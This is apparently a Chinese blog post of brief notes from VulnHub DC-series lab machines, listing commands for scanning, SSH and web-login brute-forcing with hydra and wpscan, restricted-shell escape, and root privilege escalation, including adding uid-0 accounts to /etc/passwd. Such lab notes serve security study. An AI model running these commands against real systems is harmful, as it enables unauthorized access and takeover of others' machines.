vulnhub收获总结

发布于 2022-03-05  1496 次阅读


  • DC-1
    • nmap -sC -sV -v -p- -A 192.168.192.129
    • python -c "import pty;pty.spawn('/bin/bash')"使用交互shell
    • find / -user root -perm -4000 -print 2>/dev/null       SUIDt提权
      注:1.Nmap/Vim/find/Bash/More/Less/Nano/cp这几个是已知的可用来提权的linux可执行的文件
    • hydra -l flag4 -P /usr/share/john/password.lst 192.168.0.103 ssh -vV -f
      • -l指定用户名
      • -P指定密码字典文件
      • -vV爆破一次在终端打印一行
      • -f成功爆破密码后,停止爆破
      • -P指定密码文件
      • -p指定密码
    • https://www.exploit-db.com/exploits
  • DC-2
    • C:\Windows\System32\drivers\etc\hosts
      /etc/hosts    本地DNS位置
    • dirb 192.168.0.131   目录爆破
    • cewl http://dc-2 -w dict.txt    利用cewl生成字典
    • wpscan --url http://dc-2 --enumerate u    针对wp进行用户名枚举
      wpscan --url http://dc-2 --usernames 'admin,jerry,tom' --passwords dict.txt  配和之前的进行爆破
    • ssh tom@192.168.0.131 -p 7744
    • BASH_CMDS[a]=/bin/sh;a
      export PATH=$PATH:/bin/
      export PATH=$PATH:/usr/bin
      echo /*           rbash逃逸
    • sudo -l
    • sudo git -p --help    git提权
  • DC-4
    • $ echo "admin::0:0:::/bin/sh" | sudo teehee -a /etc/passwd     建立用户
    • hydra -l admin -P /usr/share/john/password.lst -f 192.168.0.151 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout"               九头蛇post爆破
  • DC-5
    • wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.0.100/thankyou.php?FUZZ=/etc/passwd     wfuzz文件包含参数测试
    • find / -perm -4000 -user root 2>/dev/null    查看一下有什么可以提权的文件
    • kali上 nc -lvp 5555 < rootshell 在靶机上
      nc 192.168.0.103 5555 > rootshell,传完kali,ctal+c断开连接下一个    nc传文件
    • whatweb -v 192.168.0.100   信息收集
  • DC-6
    • echo 'os.execute("/bin/bash")' > shell
      sudo nmap --script=shell                   nmap提权
  • DC-7
    • drush user-password admin --password="123"     drush改密码
  • DC-8
    • searchsploit exim   查找exp
  • DC-9
    • knockd保护ssh服务,破解
    • openssl passwd -1 -salt root1 666
      root1:$1$root1$XWBhesw1wJPdUdB54.rhA.:0:0::/root:/bin/bash
      echo 'root1:$1$root1$XWBhesw1wJPdUdB54.rhA.:0:0::/root:/bin/bash' > /tmp/pass
      sudo /opt/devstuff/dist/test/test /tmp/pass /etc/passwd           伪root用户建立
子夜不哭
最后更新于 2022-03-05